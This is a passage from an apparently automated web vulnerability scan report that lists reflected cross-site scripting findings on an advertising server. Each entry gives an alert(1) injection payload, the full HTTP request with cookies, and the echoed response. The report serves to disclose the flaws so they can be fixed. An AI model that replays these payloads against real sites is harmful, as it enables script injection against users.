<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM89f1b"><script>alert(1)</script>7b3269718e9/1517820740/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.341. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11824141209@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf58f"><script>alert(1)</script>d6fa7baad79 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11824141209@x23cf58f"><script>alert(1)</script>d6fa7baad79?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 324
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/76761339/x23cf58f"><script>alert(1)</script>d6fa7baad79/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IM
...[SNIP]...

4.342. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11824141209@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98145"-alert(1)-"bde28f2b39e was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/11824141209@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_30098145"-alert(1)-"bde28f2b39e HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_30098145"-alert(1)-"bde28f2b39e";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

4.343. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11824141209@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12cb8"-alert(1)-"b52dcf6ee5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/11824141209@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300&12cb8"-alert(1)-"b52dcf6ee5d=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&12cb8"-alert(1)-"b52dcf6ee5d=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

4.344. http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11940003036@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4479"><script>alert(1)</script>e92a94cc08f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMb4479"><script>alert(1)</script>e92a94cc08f/2010DM/11940003036@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251858

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMb4479"><script>alert(1)</script>e92a94cc08f/2010DM/34071882/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IM
...[SNIP]...

4.345. http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11940003036@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b208b"><script>alert(1)</script>a1467d27b2b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMb208b"><script>alert(1)</script>a1467d27b2b/11940003036@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251858

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMb208b"><script>alert(1)</script>a1467d27b2b/1735241096/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.346. http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11940003036@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac744"><script>alert(1)</script>72c75e8abaa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11940003036@x23ac744"><script>alert(1)</script>72c75e8abaa?USNetwork/RS_SELL_2011Q1_AOL_CPA_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251858

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1273799110/x23ac744"><script>alert(1)</script>72c75e8abaa/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.347. http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_160 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11940003036@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_160 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a24a5"-alert(1)-"0b090863dfc was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_160 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/11940003036@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_160a24a5"-alert(1)-"0b090863dfc HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251858

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_160a24a5"-alert(1)-"0b090863dfc";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

4.348. http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11940003036@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 861ee"-alert(1)-"97f1109ca7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/11940003036@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_160&861ee"-alert(1)-"97f1109ca7d=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251858

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_160&861ee"-alert(1)-"97f1109ca7d=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

4.349. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12000985820@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76e2e"><script>alert(1)</script>d6d52f497d8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM76e2e"><script>alert(1)</script>d6d52f497d8/2010DM/12000985820@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262268

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM76e2e"><script>alert(1)</script>d6d52f497d8/2010DM/125451304/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.350. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12000985820@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f784"><script>alert(1)</script>ebe5c348809 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM9f784"><script>alert(1)</script>ebe5c348809/12000985820@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262268

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM9f784"><script>alert(1)</script>ebe5c348809/421479954/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.351. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12000985820@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa3cd"><script>alert(1)</script>938a4db3496 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/12000985820@x23aa3cd"><script>alert(1)</script>938a4db3496?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262268

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/2059577805/x23aa3cd"><script>alert(1)</script>938a4db3496/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.352. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12000985820@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e64e"-alert(1)-"ec42b83e34b was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/12000985820@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_3003e64e"-alert(1)-"ec42b83e34b HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
